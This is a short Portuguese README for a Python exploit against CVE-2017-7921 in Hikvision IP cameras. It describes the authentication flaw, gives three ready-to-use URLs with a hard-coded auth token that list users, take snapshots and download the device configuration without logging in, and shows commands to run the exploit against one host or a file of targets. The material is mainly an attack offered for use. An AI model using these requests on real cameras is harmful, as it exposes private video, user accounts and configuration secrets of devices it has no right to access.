
Exploit em Python para CVE-2017-7921 em câmeras IP Hikvision, realizando enumeração de usuários sem autenticação, captura de snapshots e download do arquivo de configuração por meio de requisições HTTP personalizadas.
Um problema de autenticação imprópria foi descoberto em dispositivos Hikvision.
A vulnerabilidade de autenticação imprópria ocorre quando um aplicativo não autentica os usuários de forma adequada ou correta.
Isso pode permitir que um usuário mal-intencionado eleve seus privilégios no sistema e obtenha acesso a informações confidenciais.
https://seclists.org/fulldisclosure/2017/Sep/23
Detalhes da vulnerabilidade:
----------------------
Obter uma lista de todos os usuários e suas funções:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obter um snapshot da câmera sem autenticação:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
E pior de tudo, é possível baixar a configuração da câmera:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
